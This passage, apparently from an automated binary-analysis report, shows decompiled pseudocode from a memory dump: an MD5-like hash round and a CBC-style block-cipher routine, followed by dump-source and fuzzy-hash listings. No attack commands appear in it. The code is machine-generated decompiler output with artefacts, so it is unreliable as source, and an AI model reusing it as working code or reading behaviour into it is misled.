                                                              					asm("rol edx, 0xb");
                                                              					_t390 = _t387 +  *_t139 - 0x1924661b + (_t285 ^ _t338 ^ _t238) + _t238;
                                                              					_t145 = _t649 + 8; // 0x8d0001c6
                                                              					asm("rol ecx, 0x10");
                                                              					_t341 = _t338 +  *_t142 + 0x1fa27cf8 + (_t238 ^ _t285 ^ _t390) + _t390;
                                                              					asm("rol ebx, 0x17");
                                                              					_t288 = _t285 +  *_t145 - 0x3b53a99b + (_t390 ^ _t238 ^ _t341) + _t341;
                                                              					_t150 = _t649 + 0x1c; // 0x5cc4835e
                                                              					asm("rol eax, 0x6");
                                                              					_t241 = _t238 +  *_t649 - 0xbd6ddbc + ((0xffffffff ^ _t390 | _t288) ^ _t341) + _t288;
                                                              					_t153 = _t649 + 0x38; // 0xc1c8330c
                                                              					asm("rol edx, 0xa");
                                                              					_t393 = _t390 +  *_t150 + 0x432aff97 + ((0xffffffff ^ _t341 | _t241) ^ _t288) + _t241;
                                                              					_t156 = _t649 + 0x14; // 0x830000bf
                                                              					asm("rol ecx, 0xf");
                                                              					_t344 = _t341 +  *_t153 - 0x546bdc59 + ((0xffffffff ^ _t288 | _t393) ^ _t241) + _t393;
                                                              					_t159 = _t649 + 0x30; // 0x8b0424
                                                              					asm("rol ebx, 0x15");
                                                              					_t291 = _t288 +  *_t156 - 0x36c5fc7 + ((0xffffffff ^ _t241 | _t344) ^ _t393) + _t344;
                                                              					_t162 = _t649 + 0xc; // 0x6a182454
                                                              					asm("rol eax, 0x6");
                                                              					_t244 = _t241 +  *_t159 + 0x655b59c3 + ((0xffffffff ^ _t393 | _t291) ^ _t344) + _t291;
                                                              					_t165 = _t649 + 0x28; // 0xcccccccc
                                                              					asm("rol edx, 0xa");
                                                              					_t396 = _t393 +  *_t162 - 0x70f3336e + ((0xffffffff ^ _t344 | _t244) ^ _t291) + _t244;
                                                              					_t168 = _t649 + 4; // 0xe3e85651
                                                              					asm("rol ecx, 0xf");
                                                              					_t347 = _t344 +  *_t165 - 0x100b83 + ((0xffffffff ^ _t291 | _t396) ^ _t244) + _t396;
                                                              					_t171 = _t649 + 0x20; // 0xccccccc3
                                                              					asm("rol ebx, 0x15");
                                                              					_t294 = _t291 +  *_t168 - 0x7a7ba22f + ((0xffffffff ^ _t244 | _t347) ^ _t396) + _t347;
                                                              					_t174 = _t649 + 0x3c; // 0xe1810ce9
                                                              					asm("rol eax, 0x6");
                                                              					_t247 = _t244 +  *_t171 + 0x6fa87e4f + ((0xffffffff ^ _t396 | _t294) ^ _t347) + _t294;
                                                              					_t177 = _t649 + 0x18; // 0xc68b1cc4
                                                              					asm("rol edx, 0xa");
                                                              					_t399 = _t396 +  *_t174 - 0x1d31920 + ((0xffffffff ^ _t347 | _t247) ^ _t294) + _t247;
                                                              					_t180 = _t649 + 0x34; // 0xe9c1c88b
                                                              					asm("rol ecx, 0xf");
                                                              					_t350 = _t347 +  *_t177 - 0x5cfebcec + ((0xffffffff ^ _t294 | _t399) ^ _t247) + _t399;
                                                              					_t183 = _t649 + 0x10; // 0xc7e8525c
                                                              					asm("rol ebx, 0x15");
                                                              					_t297 = _t294 +  *_t180 + 0x4e0811a1 + ((0xffffffff ^ _t247 | _t350) ^ _t399) + _t350;
                                                              					_t186 = _t649 + 0x2c; // 0x448bcccc
                                                              					asm("rol eax, 0x6");
                                                              					_t250 = _t247 +  *_t183 - 0x8ac817e + ((0xffffffff ^ _t399 | _t297) ^ _t350) + _t297;
                                                              					_t189 = _t649 + 8; // 0x8d0001c6
                                                              					asm("rol edx, 0xa");
                                                              					_t402 = _t399 +  *_t186 - 0x42c50dcb + ((0xffffffff ^ _t350 | _t250) ^ _t297) + _t250;
                                                              					_t192 = _t649 + 0x24; // 0xcccccccc
                                                              					asm("rol ecx, 0xf");
                                                              					_t353 = _t350 +  *_t189 + 0x2ad7d2bb + ((0xffffffff ^ _t297 | _t402) ^ _t250) + _t402;
                                                              					_t714 =  *((intOrPtr*)(_t715 + 0x18));
                                                              					_t649 = _t649 + 0x40;
                                                              					asm("rol ebx, 0x15");
                                                              					_t202 = _t250 +  *_t714;
                                                              					_t252 = _t297 +  *_t192 - 0x14792c6f + ((0xffffffff ^ _t250 | _t353) ^ _t402) + _t353 +  *(_t714 + 4);
                                                              					_t305 = _t353 +  *(_t714 + 8);
                                                              					_t354 = _t402 +  *(_t714 + 0xc);
                                                              					 *_t714 = _t202;
                                                              					 *(_t714 + 4) = _t252;
                                                              					 *(_t714 + 8) = _t305;
                                                              					 *(_t714 + 0xc) = _t354;
                                                              				} while ( *_t715 >= _t649);
                                                              				_pop(_t251);
                                                              				return _t251;
                                                              			}
                                                              0x00bcae7a
                                                              0x00bcae7f
                                                              0x00bcae84
                                                              0x00bcae89
                                                              0x00bcae8b
                                                              0x00bcae8e
                                                              0x00bcae94
                                                              0x00bcae97
                                                              0x00bcae9a
                                                              0x00bcaea2
                                                              0x00bcaea7

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction ID: 50a9c66cfb270d1dc5c4dbf5649b389f0a03cebf8e8f2e3f5cdc5091b06c5a8d
                                                              • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction Fuzzy Hash: 172264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E00BA0E86(int __ecx) {
                                                              				void* _t249;
                                                              				signed int _t251;
                                                              				signed int _t252;
                                                              				void* _t254;
                                                              				signed int _t255;
                                                              				void* _t257;
                                                              				void* _t258;
                                                              				signed int _t261;
                                                              				void* _t264;
                                                              				signed int _t266;
                                                              				signed int _t271;
                                                              				void* _t273;
                                                              				signed int _t276;
                                                              				void* _t278;
                                                              				void* _t288;
                                                              				signed int _t289;
                                                              				signed int _t290;
                                                              				void* _t295;
                                                              				signed int _t300;
                                                              				signed int _t301;
                                                              				signed int _t305;
                                                              				signed int _t309;
                                                              				signed int _t311;
                                                              				signed int _t315;
                                                              				signed int _t318;
                                                              				int _t320;
                                                              				signed int _t321;
                                                              				signed int _t322;
                                                              				int _t328;
                                                              				int _t329;
                                                              				signed int _t334;
                                                              				signed int _t342;
                                                              				int _t346;
                                                              				signed int _t349;
                                                              				int _t352;
                                                              				signed int _t355;
                                                              				int _t357;
                                                              				void** _t361;
                                                              				signed int _t363;
                                                              				signed int _t364;
                                                              				void* _t367;
                                                              				signed int _t369;
                                                              				signed int _t372;
                                                              				signed int** _t376;
                                                              				signed int* _t377;
                                                              				signed int _t378;
                                                              				signed int _t381;
                                                              				signed int _t385;
                                                              				intOrPtr _t389;
                                                              				void* _t390;
                                                              				void* _t391;
                                                              				signed int* _t393;
                                                              				void* _t406;
                                                              				void* _t407;
                                                              				void* _t415;
                                                              				void* _t416;
                                                              				int _t419;
                                                              				void** _t420;
                                                              				signed int* _t421;
                                                              				void** _t423;
                                                              				void* _t424;
                                                              				signed int* _t428;
                                                              				signed int* _t429;
                                                              				void** _t431;
                                                              				void* _t433;
                                                              				void* _t438;
                                                              				void* _t440;
                                                              				void* _t441;
                                                              				int _t443;
                                                              				signed int* _t444;
                                                              				void* _t445;
                                                              				void* _t448;
                                                              				signed int* _t450;
                                                              				void* _t453;
                                                              				void* _t459;
                                                              				signed int _t465;
                                                              				signed int _t466;
                                                              				void* _t469;
                                                              				signed int* _t471;
                                                              				signed int* _t472;
                                                              				void** _t474;
                                                              				void** _t478;
                                                              				void** _t479;
                                                              				void** _t481;
                                                              				void* _t484;
                                                              				signed int _t485;
                                                              				void* _t493;
                                                              				intOrPtr _t496;
                                                              				void* _t498;
                                                              				void* _t508;
                                                              				signed int _t513;
                                                              
                                                              				_t320 = __ecx;
                                                              				_pop(_t484);
                                                              				_t2 = _t484 - 0x2346; // 0xa56363c6
                                                              				_t485 = _t2;
                                                              				if( *((intOrPtr*)(_t496 + 0x28)) == 0) {
                                                              					_t485 = _t485 + 0x1680;
                                                              				}
                                                              				asm("pushfd");
                                                              				asm("cld");
                                                              				if(_t320 < 0x200) {
                                                              					L30:
                                                              					_t389 =  *((intOrPtr*)(_t496 + 0x24));
                                                              					_t438 = (_t496 - 0x00000050 & 0xffffffc0) - ( ~(_t389 - 0x8f - (_t496 - 0x00000050 & 0xffffffc0)) & 0x000003c0);
                                                              					_t361 = _t496 + 0x18;
                                                              					_t498 = _t438 + 4;
                                                              					 *((intOrPtr*)(_t498 + 0x18)) = _t485 + (_t438 + 0x00000300 - _t485 & 0x00000300) + 0x880;
                                                              					 *((intOrPtr*)(_t498 + 0x1c)) = _t496;
                                                              					 *((intOrPtr*)(_t498 + 0x34)) =  *0xecc790;
                                                              					_t249 =  *_t361;
                                                              					_t288 = _t361[1];
                                                              					_t440 = _t361[4];
                                                              					 *(_t498 + 0x20) = _t249;
                                                              					 *(_t498 + 0x24) = _t288;
                                                              					 *(_t498 + 0x28) = _t320;
                                                              					 *((intOrPtr*)(_t498 + 0x2c)) = _t389;
                                                              					 *(_t498 + 0x30) = _t440;
                                                              					_t390 = _t440;
                                                              					_t441 = _t249;
                                                              					__eflags = _t361[5];
                                                              					if(__eflags == 0) {
                                                              						asm("bt dword [esp+0x34], 0x19");
                                                              						if(__eflags >= 0) {
                                                              							while(1) {
                                                              								_t289 =  *(_t441 + 4);
                                                              								_t321 =  *(_t441 + 8);
                                                              								_t363 =  *(_t441 + 0xc);
                                                              								_t391 = _t498 + 0x3c;
                                                              								 *_t391 =  *_t441;
                                                              								 *(_t391 + 4) = _t289;
                                                              								 *(_t391 + 8) = _t321;
                                                              								 *(_t391 + 0xc) = _t363;
                                                              								_t251 = E00B9F830( *_t441, _t289, _t321, _t363,  *((intOrPtr*)(_t498 + 0x2c)));
                                                              								_t393 =  *(_t498 + 0x30);
                                                              								_t252 = _t251 ^  *_t393;
                                                              								_t290 = _t289 ^ _t393[1];
                                                              								_t322 = _t321 ^ _t393[2];
                                                              								_t364 = _t363 ^ _t393[3];
                                                              								_t443 =  *(_t498 + 0x28) - 0x10;
                                                              								__eflags = _t443;
                                                              								if(__eflags < 0) {
                                                              									break;
                                                              								}
                                                              								 *(_t498 + 0x28) = _t443;
                                                              								_t448 =  *(_t498 + 0x24);
                                                              								 *_t448 = _t252;
                                                              								 *(_t448 + 4) = _t290;
                                                              								 *(_t448 + 8) = _t322;
                                                              								 *(_t448 + 0xc) = _t364;
                                                              								 *(_t498 + 0x24) = _t448 + 0x10;
                                                              								_t450 = _t498 + 0x3c;
                                                              								_t255 =  *_t450;
                                                              								 *_t393 = _t255;
                                                              								_t393[1] = _t450[1];
                                                              								_t393[2] = _t450[2];
                                                              								_t393[3] = _t450[3];
                                                              								_t441 =  *(_t498 + 0x20) + 0x10;
                                                              								 *(_t498 + 0x20) = _t441;
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									asm("popfd");
                                                              									return _t255;
                                                              								}
                                                              								goto L54;
                                                              							}
                                                              							_t444 = _t498 + 0x3c;
                                                              							 *_t444 = _t252;
                                                              							_t444[1] = _t290;
                                                              							_t444[2] = _t322;
                                                              							_t444[3] = _t364;
                                                              							_t445 =  *(_t498 + 0x20);
                                                              							 *_t393 =  *_t445;
                                                              							_t393[1] =  *(_t445 + 4);
                                                              							_t393[2] =  *(_t445 + 8);
                                                              							_t393[3] =  *(_t445 + 0xc);
                                                              							_t254 = memcpy( *(_t498 + 0x24), _t498 + 0x3c,  *(_t498 + 0x28));
                                                              							asm("popfd");
                                                              							return _t254;
                                                              						} else {
                                                              							while(1) {
                                                              								asm("movq mm0, [esi]");
                                                              								asm("movq mm4, [esi+0x8]");
                                                              								E00B9FCB0( *((intOrPtr*)(_t498 + 0x2c)));
                                                              								_t453 =  *(_t498 + 0x20);
                                                              								_t257 = _t498 + 0x3c;
                                                              								_t295 =  *(_t498 + 0x24);
                                                              								asm("movq mm1, [esi]");
                                                              								asm("movq mm5, [esi+0x8]");
                                                              								asm("pxor mm0, [edi]");
                                                              								asm("pxor mm4, [edi+0x8]");
                                                              								asm("movq [edi], mm1");
                                                              								asm("movq [edi+0x8], mm5");
                                                              								_t328 =  *(_t498 + 0x28) - 0x10;
                                                              								__eflags = _t328;
                                                              								if(__eflags < 0) {
                                                              									break;
                                                              								}
                                                              								asm("movq [ebx], mm0");
                                                              								asm("movq [ebx+0x8], mm4");
                                                              								 *(_t498 + 0x24) = _t295 + 0x10;
                                                              								 *(_t498 + 0x20) = _t453 + 0x10;
                                                              								 *(_t498 + 0x28) = _t328;
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									asm("emms");
                                                              									asm("popfd");
                                                              									return _t257;
                                                              								}
                                                              								goto L54;
                                                              							}
                                                              							asm("movq [eax], mm0");
                                                              							asm("movq [eax+0x8], mm4");
                                                              							asm("emms");
                                                              							_t329 = _t328 + 0x10;
                                                              							__eflags = _t329;
                                                              							_t258 = memcpy(_t295, _t257, _t329);
                                                              							asm("popfd");
                                                              							return _t258;
                                                              						}
                                                              					} else {
                                                              						__eflags = _t320 - 0x10;
                                                              						_t367 = _t288;
                                                              						if(__eflags < 0) {
                                                              							L41:
                                                              							asm("emms");
                                                              							_t406 = _t367;
                                                              							_t300 = 0x10 - _t320;
                                                              							__eflags = _t406 - _t441;
                                                              							if(_t406 == _t441) {
                                                              								_t407 = _t406 + _t320;
                                                              							} else {
                                                              								memcpy(_t406, _t441, _t320);
                                                              								_t498 = _t498 + 0xc;
                                                              								_t407 = _t441 + _t320 + _t320;
                                                              							}
                                                              							memset(_t407, 0, _t300 << 0);
                                                              							_t498 = _t498 + 0xc;
                                                              							_t390 =  *(_t498 + 0x30);
                                                              							_t441 = _t367;
                                                              							_t261 =  *_t390;
                                                              							_t301 =  *(_t390 + 4);
                                                              							 *(_t498 + 0x28) = 0x10;
                                                              							goto L38;
                                                              						} else {
                                                              							asm("bt dword [esp+0x34], 0x19");
                                                              							if(__eflags >= 0) {
                                                              								_t261 =  *_t390;
                                                              								_t301 =  *(_t390 + 4);
                                                              								do {
                                                              									L38:
                                                              									_t301 = _t301 ^  *(_t441 + 4);
                                                              									_t334 =  *(_t390 + 8) ^  *(_t441 + 8);
                                                              									_t369 =  *(_t390 + 0xc) ^  *(_t441 + 0xc);
                                                              									_t261 = E00B9E380(_t261 ^  *_t441, _t301, _t334, _t369,  *((intOrPtr*)(_t498 + 0x2c)));
                                                              									_t390 =  *(_t498 + 0x24);
                                                              									 *_t390 = _t261;
                                                              									 *(_t390 + 4) = _t301;
                                                              									 *(_t390 + 8) = _t334;
                                                              									 *(_t390 + 0xc) = _t369;
                                                              									_t441 =  *(_t498 + 0x20) + 0x10;
                                                              									 *(_t498 + 0x20) = _t441;
                                                              									_t367 = _t390 + 0x10;
                                                              									 *(_t498 + 0x24) = _t367;
                                                              									_t320 =  *(_t498 + 0x28) - 0x10;
                                                              									__eflags = _t320 - 0x10;
                                                              									 *(_t498 + 0x28) = _t320;
                                                              								} while (_t320 >= 0x10);
                                                              								__eflags = _t320 & 0x0000000f;
                                                              								if((_t320 & 0x0000000f) != 0) {
                                                              									goto L41;
                                                              								}
                                                              								_t459 =  *(_t498 + 0x30);
                                                              								 *_t459 = _t261;
                                                              								 *(_t459 + 4) = _t301;
                                                              								 *(_t459 + 8) =  *(_t390 + 8);
                                                              								 *(_t459 + 0xc) =  *(_t390 + 0xc);
                                                              								asm("popfd");
                                                              								return _t261;
                                                              							} else {
                                                              								asm("movq mm0, [edi]");
                                                              								asm("movq mm4, [edi+0x8]");
                                                              								0;
                                                              								0;
                                                              								do {
                                                              									asm("pxor mm0, [esi]");
                                                              									asm("pxor mm4, [esi+0x8]");
                                                              									_t264 = E00B9E6E0( *((intOrPtr*)(_t498 + 0x2c)));
                                                              									asm("movq [edi], mm0");
                                                              									asm("movq [edi+0x8], mm4");
                                                              									_t441 =  *(_t498 + 0x20) + 0x10;
                                                              									 *(_t498 + 0x20) = _t441;
                                                              									_t367 =  *(_t498 + 0x24) + 0x10;
                                                              									 *(_t498 + 0x24) = _t367;
                                                              									_t320 =  *(_t498 + 0x28) - 0x10;
                                                              									__eflags = _t320 - 0x10;
                                                              									 *(_t498 + 0x28) = _t320;
                                                              								} while (_t320 >= 0x10);
                                                              								__eflags = _t320 & 0x0000000f;
                                                              								if((_t320 & 0x0000000f) != 0) {
                                                              									goto L41;
                                                              								} else {
                                                              									asm("movq [esi], mm0");
                                                              									asm("movq [esi+0x8], mm4");
                                                              									asm("emms");
                                                              									asm("popfd");
                                                              									return _t264;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					_t513 = _t320 & 0x0000000f;
                                                              					if(_t513 != 0) {
                                                              						goto L30;
                                                              					} else {
                                                              						asm("bt dword [eax], 0x1c");
                                                              						if(_t513 < 0) {
                                                              							goto L30;
                                                              						} else {
                                                              							_t465 = _t496 - 0x00000144 & 0xffffffc0;
                                                              							_t7 = _t485 + 0x900; // 0xa5636cc6
                                                              							_t266 = _t485 & 0x00000fff;
                                                              							_t305 = _t7 & 0x00000fff;
                                                              							_t372 = _t465 & 0x00000fff;
                                                              							if(_t372 < _t305) {
                                                              								_t466 = _t465 - (_t372 - _t266 & 0x00000fff) + 0x180;
                                                              								__eflags = _t466;
                                                              							} else {
                                                              								_t466 = _t465 - _t372 - _t305;
                                                              							}
                                                              							_t376 = _t496 + 0x18;
                                                              							_t508 = _t466 + 4;
                                                              							 *(_t508 + 0x18) = _t485;
                                                              							 *((intOrPtr*)(_t508 + 0x1c)) = _t496;
                                                              							_t415 = _t376[3];
                                                              							_t377 = _t376[5];
                                                              							 *(_t508 + 0x20) =  *_t376;
                                                              							 *(_t508 + 0x24) = _t376[1];
                                                              							 *(_t508 + 0x28) = _t320;
                                                              							 *(_t508 + 0x2c) = _t415;
                                                              							 *(_t508 + 0x30) = _t376[4];
                                                              							 *(_t508 + 0x13c) = 0;
                                                              							_t469 = _t415;
                                                              							_t309 = _t415 - _t485 & 0x00000fff;
                                                              							_t416 = _t508 + 0x4c;
                                                              							if(_t309 < 0x900) {
                                                              								L11:
                                                              								 *(_t508 + 0x2c) = _t416;
                                                              								memcpy(_t416, _t469, 0x3d << 2);
                                                              								_t508 = _t508 + 0xc;
                                                              							} else {
                                                              								if(_t309 >= 0xf0c) {
                                                              									goto L11;
                                                              								}
                                                              							}
                                                              							_t419 = 0x10;
                                                              							do {
                                                              								_t485 = _t485 + 0x80;
                                                              								_t419 = _t419 - 1;
                                                              							} while (_t419 != 0);
                                                              							_t493 = _t485 - 0x800;
                                                              							_t471 =  *(_t508 + 0x20);
                                                              							_t420 =  *(_t508 + 0x30);
                                                              							if(_t377 == 0) {
                                                              								__eflags = _t471 -  *(_t508 + 0x24);
                                                              								if(_t471 ==  *(_t508 + 0x24)) {
                                                              									do {
                                                              										_t311 = _t471[1];
                                                              										_t342 = _t471[2];
                                                              										_t378 = _t471[3];
                                                              										_t421 = _t508 + 0x3c;
                                                              										 *_t421 =  *_t471;
                                                              										_t421[1] = _t311;
                                                              										_t421[2] = _t342;
                                                              										_t421[3] = _t378;
                                                              										_t271 = E00B9FF80( *_t471, _t311, _t342, _t378,  *(_t508 + 0x2c));
                                                              										_t423 =  *(_t508 + 0x30);
                                                              										_t472 =  *(_t508 + 0x24);
                                                              										 *_t472 = _t271 ^  *_t423;
                                                              										_t472[1] = _t311 ^ _t423[1];
                                                              										_t472[2] = _t342 ^ _t423[2];
                                                              										_t472[3] = _t378 ^ _t423[3];
                                                              										 *(_t508 + 0x24) =  &(_t472[4]);
                                                              										_t474 = _t508 + 0x3c;
                                                              										_t273 =  *_t474;
                                                              										 *_t423 = _t273;
                                                              										_t423[1] = _t474[1];
                                                              										_t423[2] = _t474[2];
                                                              										_t423[3] = _t474[3];
                                                              										_t471 =  &(( *(_t508 + 0x20))[4]);
                                                              										 *(_t508 + 0x20) = _t471;
                                                              										_t346 =  *(_t508 + 0x28) - 0x10;
                                                              										__eflags = _t346;
                                                              										 *(_t508 + 0x28) = _t346;
                                                              									} while (_t346 != 0);
                                                              								} else {
                                                              									 *(_t508 + 0x34) = _t420;
                                                              									do {
                                                              										_t315 = _t471[1];
                                                              										_t349 = _t471[2];
                                                              										_t381 = _t471[3];
                                                              										_t276 = E00B9FF80( *_t471, _t315, _t349, _t381,  *(_t508 + 0x2c));
                                                              										_t428 =  *(_t508 + 0x34);
                                                              										_t429 =  *(_t508 + 0x24);
                                                              										_t478 =  *(_t508 + 0x20);
                                                              										 *_t429 = _t276 ^  *_t428;
                                                              										_t429[1] = _t315 ^ _t428[1];
                                                              										_t429[2] = _t349 ^ _t428[2];
                                                              										_t429[3] = _t381 ^ _t428[3];
                                                              										 *(_t508 + 0x34) = _t478;
                                                              										_t471 =  &(_t478[4]);
                                                              										 *(_t508 + 0x20) = _t471;
                                                              										 *(_t508 + 0x24) =  &(_t429[4]);
                                                              										_t352 =  *(_t508 + 0x28) - 0x10;
                                                              										__eflags = _t352;
                                                              										 *(_t508 + 0x28) = _t352;
                                                              									} while (_t352 != 0);
                                                              									_t431 =  *(_t508 + 0x34);
                                                              									_t479 =  *(_t508 + 0x30);
                                                              									_t273 =  *_t431;
                                                              									 *_t479 = _t273;
                                                              									_t479[1] = _t431[1];
                                                              									_t479[2] = _t431[2];
                                                              									_t479[3] = _t431[3];
                                                              								}
                                                              								__eflags =  *(_t508 + 0x13c);
                                                              								_t424 =  *(_t508 + 0x2c);
                                                              								if( *(_t508 + 0x13c) != 0) {
                                                              									__eflags = 0;
                                                              									_t273 = memset(_t424, 0, 0x3c << 2);
                                                              									_t508 = _t508 + 0xc;
                                                              								}
                                                              								asm("popfd");
                                                              								return _t273;
                                                              							} else {
                                                              								_t278 =  *_t420;
                                                              								_t318 = _t420[1];
                                                              								0;
                                                              								0;
                                                              								do {
                                                              									_t318 = _t318 ^ _t471[1];
                                                              									_t355 = _t420[2] ^ _t471[2];
                                                              									_t385 = _t420[3] ^ _t471[3];
                                                              									_t278 = E00B9E8F0(_t278 ^  *_t471, _t318, _t355, _t385,  *(_t508 + 0x2c), _t493);
                                                              									_t420 =  *(_t508 + 0x24);
                                                              									 *_t420 = _t278;
                                                              									_t420[1] = _t318;
                                                              									_t420[2] = _t355;
                                                              									_t420[3] = _t385;
                                                              									_t471 =  &(( *(_t508 + 0x20))[4]);
                                                              									 *(_t508 + 0x20) = _t471;
                                                              									 *(_t508 + 0x24) =  &(_t420[4]);
                                                              									_t357 =  *(_t508 + 0x28) - 0x10;
                                                              									 *(_t508 + 0x28) = _t357;
                                                              								} while (_t357 != 0);
                                                              								_t481 =  *(_t508 + 0x30);
                                                              								 *_t481 = _t278;
                                                              								_t481[1] = _t318;
                                                              								_t481[2] = _t420[2];
                                                              								_t481[3] = _t420[3];
                                                              								_t433 =  *(_t508 + 0x2c);
                                                              								if( *(_t508 + 0x13c) != 0) {
                                                              									_t278 = memset(_t433, 0, 0x3c << 2);
                                                              									_t508 = _t508 + 0xc;
                                                              								}
                                                              								asm("popfd");
                                                              								return _t278;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				L54:
                                                              			}
                                                              0x00ba0ef5
                                                              0x00ba0ef7
                                                              0x00ba0ef7
                                                              0x00ba0f10
                                                              0x00ba0f16
                                                              0x00ba0f19
                                                              0x00ba0f1d
                                                              0x00ba0f26
                                                              0x00ba0f2c
                                                              0x00ba0f2f
                                                              0x00ba0f33
                                                              0x00ba0f37
                                                              0x00ba0f3b
                                                              0x00ba0f3f
                                                              0x00ba0f43
                                                              0x00ba0f57
                                                              0x00ba0f59
                                                              0x00ba0f5f
                                                              0x00ba0f69
                                                              0x00ba0f7c
                                                              0x00ba0f7c
                                                              0x00ba0f82
                                                              0x00ba0f82
                                                              0x00ba0f6f
                                                              0x00ba0f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba0f75
                                                              0x00ba0f84
                                                              0x00ba0f8c
                                                              0x00ba0f98
                                                              0x00ba0f9e
                                                              0x00ba0f9e
                                                              0x00ba0fa7
                                                              0x00ba0fad
                                                              0x00ba0fb1
                                                              0x00ba0fb8
                                                              0x00ba1060
                                                              0x00ba1064
                                                              0x00ba10f0
                                                              0x00ba10f2
                                                              0x00ba10f5
                                                              0x00ba10f8
                                                              0x00ba10fb
                                                              0x00ba10ff
                                                              0x00ba1101
                                                              0x00ba1104
                                                              0x00ba1107
                                                              0x00ba110e
                                                              0x00ba1113
                                                              0x00ba1117
                                                              0x00ba1126
                                                              0x00ba1128
                                                              0x00ba112b
                                                              0x00ba112e
                                                              0x00ba1134
                                                              0x00ba1138
                                                              0x00ba113c
                                                              0x00ba1147
                                                              0x00ba1149
                                                              0x00ba114c
                                                              0x00ba114f
                                                              0x00ba115a
                                                              0x00ba115d
                                                              0x00ba1161
                                                              0x00ba1161
                                                              0x00ba1164
                                                              0x00ba1164
                                                              0x00ba106a
                                                              0x00ba106a
                                                              0x00ba1070
                                                              0x00ba1072
                                                              0x00ba1075
                                                              0x00ba1078
                                                              0x00ba107f
                                                              0x00ba1084
                                                              0x00ba1097
                                                              0x00ba109b
                                                              0x00ba109f
                                                              0x00ba10a1
                                                              0x00ba10a4
                                                              0x00ba10a7
                                                              0x00ba10ae
                                                              0x00ba10b2
                                                              0x00ba10b5
                                                              0x00ba10bc
                                                              0x00ba10c0
                                                              0x00ba10c0
                                                              0x00ba10c3
                                                              0x00ba10c3
                                                              0x00ba10cd
                                                              0x00ba10d1
                                                              0x00ba10d5
                                                              0x00ba10e0
                                                              0x00ba10e2
                                                              0x00ba10e5
                                                              0x00ba10e8
                                                              0x00ba10e8
                                                              0x00ba1170
                                                              0x00ba1178
                                                              0x00ba117c
                                                              0x00ba1187
                                                              0x00ba118e
                                                              0x00ba118e
                                                              0x00ba118e
                                                              0x00ba1194
                                                              0x00ba1199
                                                              0x00ba0fbe
                                                              0x00ba0fbe
                                                              0x00ba0fc0
                                                              0x00ba0fc9
                                                              0x00ba0fcd
                                                              0x00ba0fd0
                                                              0x00ba0fd8
                                                              0x00ba0fdb
                                                              0x00ba0fde
                                                              0x00ba0fe5
                                                              0x00ba0fee
                                                              0x00ba0ff2
                                                              0x00ba0ff4
                                                              0x00ba0ff7
                                                              0x00ba0ffa
                                                              0x00ba0ffd
                                                              0x00ba1004
                                                              0x00ba100b
                                                              0x00ba100f
                                                              0x00ba1012
                                                              0x00ba1012
                                                              0x00ba101c
                                                              0x00ba1026
                                                              0x00ba1028
                                                              0x00ba102b
                                                              0x00ba102e
                                                              0x00ba1039
                                                              0x00ba103d
                                                              0x00ba104e
                                                              0x00ba104e
                                                              0x00ba104e
                                                              0x00ba1054
                                                              0x00ba1059
                                                              0x00ba1059
                                                              0x00ba0fb8
                                                              0x00ba0ec2
                                                              0x00ba0eb8
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1df40e83eebdcc5c234546da4c4edb33c57b9559b3b1d56de9795af6dbb0e79
                                                              • Instruction ID: 164f58c889df694a67d3fcf3506d543f635fa4ee6829c3299f9269971a1e7934
                                                              • Opcode Fuzzy Hash: e1df40e83eebdcc5c234546da4c4edb33c57b9559b3b1d56de9795af6dbb0e79
                                                              • Instruction Fuzzy Hash: 6A22C076908B129FC754CF29D08055AF7E1FF89324F158A6EE9A9A3B10C730BA55CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
